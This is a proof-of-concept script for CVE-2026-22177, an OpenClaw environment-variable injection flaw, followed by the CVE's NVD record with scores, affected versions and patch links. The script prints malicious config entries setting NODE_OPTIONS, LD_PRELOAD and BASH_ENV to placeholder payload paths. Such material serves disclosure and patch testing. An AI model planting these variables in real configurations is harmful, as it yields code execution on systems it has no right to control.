CVE-2026-22177

# CVE-2026-22177 PoC - Environment Variable Injection in OpenClaw # This PoC demonstrates how malicious environment variables can be injected # through OpenClaw's config env.vars to achieve code execution import json import yaml def generate_malicious_config(): """Generate a malicious OpenClaw configuration file""" # Method 1: NODE_OPTIONS injection for Node.js based OpenClaw malicious_env_vars_node = { "env": { "vars": { "NODE_OPTIONS": "--require /path/to/malicious/module.js" } } } # Method 2: LD_PRELOAD injection for Linux environments malicious_env_vars_ld = { "env": { "vars": { "LD_PRELOAD": "/tmp/malicious.so", "LD_LIBRARY_PATH": "/tmp/malicious_libs" } } } # Method 3: Arbitrary command execution via config malicious_env_vars_exec = { "env": { "vars": { "BASH_ENV": "/tmp/malicious_script.sh" } } } return { "node_options_injection": malicious_env_vars_node, "ld_preload_injection": malicious_env_vars_ld, "bash_env_injection": malicious_env_vars_exec } def exploit_requirements(): """Requirements for successful exploitation""" return { "prerequisites": [ "Ability to modify OpenClaw configuration files", "Write access to config directory", "OpenClaw version < 2026.2.21" ], "attack_vector": "Local (AV:L)", "privileges_required": "Low (PR:L)", "user_interaction": "None (UI:N)" } if __name__ == "__main__": print("CVE-2026-22177 - OpenClaw Environment Variable Injection PoC") print("=" * 60) configs = generate_malicious_config() print(json.dumps(configs, indent=2)) print("\nExploitation Requirements:") print(json.dumps(exploit_requirements(), indent=2))

{"cve": {"id": "CVE-2026-22177", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:21.957", "lastModified": "2026-04-08T17:21:14.597", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.21 fail to filter dangerous process-control environment variables from config env.vars, allowing startup-time code execution. Attackers can inject variables like NODE_OPTIONS or LD_* through configuration to execute arbitrary code in the OpenClaw gateway service runtime context."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.21 no filtran las variables de entorno peligrosas de control de procesos de las variables de entorno de configuración, lo que permite la ejecución de código en tiempo de inicio. Los atacantes pueden inyectar variables como NODE_OPTIONS o LD_* a través de la configuración para ejecutar código arbitrario en el contexto de tiempo de ejecución del servicio de pasarela OpenClaw."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-15"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.21", "matchCriteriaId": "09CAA52D-0C33-41B4-854A-338CBFC45513"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/2cdbadee1f8fcaa93302d7debbfc529e19868ea4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8fmp-37rc-p5g7", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-config-env-vars", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}